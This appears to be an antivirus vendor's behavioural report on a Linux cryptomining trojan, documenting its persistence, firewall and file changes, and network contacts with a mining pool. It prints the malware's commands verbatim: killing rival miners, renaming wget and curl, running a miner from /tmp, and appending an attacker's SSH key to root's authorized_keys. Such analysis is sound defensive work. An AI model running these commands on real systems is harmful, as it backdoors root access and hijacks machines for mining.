Technical Information
To ensure autorun and distribution:
Creates or modifies the following files:
- /etc/rc.local
- /etc/crontab
- /var/spool/cron/crontabs/root
Malicious functions:
Launches itself as a daemon
Gets access to SSH keys
- /root/.ssh/authorized_keys
Modifies firewall settings:
- iptables -I INPUT -p tcp --dport 8017 -j ACCEPT
- iptables -I OUTPUT -p tcp --sport 8017 -j ACCEPT
- iptables -I PREROUTING -t nat -p tcp --dport 8017 -j ACCEPT
Launches processes:
- <SAMPLE_FULL_PATH> -deamon
- sh -c ps -ef | grep Circle_MI | grep -v grep | awk '{print $2}' | xargs kill -9
- ps -ef
- grep -v grep
- grep Circle_MI
- awk {print $2}
- xargs kill -9
- kill -9
- sh -c ps -ef | grep kworker34 | grep -v grep | awk '{print $2}' | xargs kill -9
- grep kworker34
- sh -c ps -ef | grep .daemond | grep -v grep | awk '{print $2}' | xargs kill -9
- grep .daemond
- sh -c ps -ef | grep /tmp/thisxxs | grep -v grep | awk '{print $2}' | xargs kill -9
- grep /tmp/thisxxs
- sh -c ps -ef | grep /opt/yilu/work/xig/xig | grep -v grep | awk '{print $2}' | xargs kill -9
- grep /opt/yilu/work/xig/xig
- sh -c ps -ef | grep /opt/yilu/mservice | grep -v grep | awk '{print $2}' | xargs kill -9
- grep /opt/yilu/mservice
- sh -c ps -ef | grep /usr/bin/.sshd | grep -v grep | awk '{print $2}' | xargs kill -9
- grep /usr/bin/.sshd
- sh -c ps -ef | grep /usr/bin/bsd-port/getty | grep -v grep | awk '{print $2}' | xargs kill -9
- grep /usr/bin/bsd-port/getty
- sh -c ps -ef | grep x86_ | grep -v grep | awk '{print $2}' | xargs kill -9
- grep x86_
- sh -c ps -ef | grep cryptonight | grep -v grep | awk '{print $2}' | xargs kill -9
- grep cryptonight
- sh -c ps -ef | grep ddg | grep -v grep | awk '{print $2}' | xargs kill -9
- grep ddg
- sh -c ps -ef | grep prohash | grep -v grep | awk '{print $2}' | xargs kill -9
- grep prohash
- sh -c ps -ef | grep monero | grep -v grep | awk '{print $2}' | xargs kill -9
- grep monero
- sh -c ps -ef | grep xmr | grep -v grep | awk '{print $2}' | xargs kill -9
- grep xmr
- sh -c ps -ef | grep miner | grep -v grep | awk '{print $2}' | xargs kill -9
- grep miner
- sh -c ps -ef | grep pool. | grep -v grep | awk '{print $2}' | xargs kill -9
- grep pool.
- sh -c ps -ef | grep tcp: | grep -v grep | awk '{print $2}' | xargs kill -9
- grep tcp:
- sh -c ps -ef | grep stratum | grep -v grep | awk '{print $2}' | xargs kill -9
- grep stratum
- sh -c killall xmr
- sh -c mv /usr/bin/wget /usr/bin/wget1&
- mv /usr/bin/wget /usr/bin/wget1
- sh -c mv /usr/bin/curl /usr/bin/curl1&
- mv /usr/bin/curl /usr/bin/curl1
- sh -c chmod +x /tmp/xmr
- chmod +x /tmp/xmr
- sh -c /tmp/xmr
- /tmp/xmr
- sh -c chmod +x /tmp/secure.sh
- chmod +x /tmp/secure.sh
- sh -c /tmp/secure.sh&
- /tmp/secure.sh
- sh -c chmod +x /tmp/auth.sh
- chmod +x /tmp/auth.sh
- sh -c /tmp/auth.sh&
- date +%b %e %H
- /tmp/auth.sh
- sh -c mkdir -p /usr/.work
- grep Oct 5 17 /var/log/secure
- grep Failed
- sort
- awk {print $(NF-3)}
- uniq -c
- awk $1>\"$LIMIT\"{print $1\":\"$2}
- mkdir -p /usr/.work
- sh -c \cp -R /root/* /usr/.work/ &
- sleep 60
- grep Oct 5 17 /var/log/auth.log
- sh -c mkdir -p /root/.ssh
- cp -R <SAMPLE_FULL_PATH> /root/run.sh /root/stdout.log /usr/.work/
- mkdir -p /root/.ssh
- sh -c chmod 700 /root/.ssh/
- chmod 700 /root/.ssh/
- sh -c echo >> /root/.ssh/authorized_keys
- sh -c chmod 600 /root/.ssh/authorized_keys
- chmod 600 /root/.ssh/authorized_keys
- sh -c echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc3BlbiQaznPT8TScrs9YIzmrpI9Lpa4LtCjB5z0LuQ4o6XwvzomxAixn2F1jaUl175Cxcg3PmUsPOLE+WeWicKqL2YZ46SotjZgnS6JjXpuZVi7V0DSiXu0itlwWDC9m8huBvUBSIsDCsgb9OeG6rlrCyZgTW+qZciK+KZ8rwlFp3CFyxoF2122ueOnl5pAUCy1iHqGun03dMdUxA1d3KnxSZ3NQrYiH69dc8/YhV4SriOW9psc0pv9KeBLF0OXHtEAdbnSlwfk2uTjjBMK0nDidl7wS52Ygi/H4+P+4EXkSzf4Jj4/L6P3c5rLC3/l3RFdo1T7EQ8fH6NsTYJNZ7 root@u911\" >> /root/.ssh/authorized_keys
- sh -c iptables -I INPUT -p tcp --dport 8017 -j ACCEPT
- sh -c iptables -I OUTPUT -p tcp --sport 8017 -j ACCEPT
- sh -c iptables -I PREROUTING -t nat -p tcp --dport 8017 -j ACCEPT
Attempts to kill the following processes:
- killall xmr
Performs operations with the file system:
Modifies file access rights:
- /tmp/xmr
- /tmp/secure.sh
- /tmp/auth.sh
- /root/.ssh
- /root/.ssh/authorized_keys
Creates folders:
- /usr/.work
- /root/.ssh
Creates or modifies files:
- /tmp/config.json
- /tmp/xmr
- /usr/bin/wget
- /tmp/secure.sh
- /tmp/auth.sh
- /usr/.work/<SAMPLE>
- /usr/.work/run.sh
- /usr/.work/stdout.log
Network activity:
Awaits incoming connections on ports:
- 127.0.0.1:14747
Establishes connection:
- <LOCAL_DNS_SERVER>
- 16#.###.226.137:6666
DNS ASK:
- xm#.##ypto-pool.fr
Sends data to the following servers:
- 16#.###.226.137:6666
Receives data from the following servers:
- 16#.###.226.137:6666
Other:
Collects CPU information
Collects RAM information
Collects information about network activity
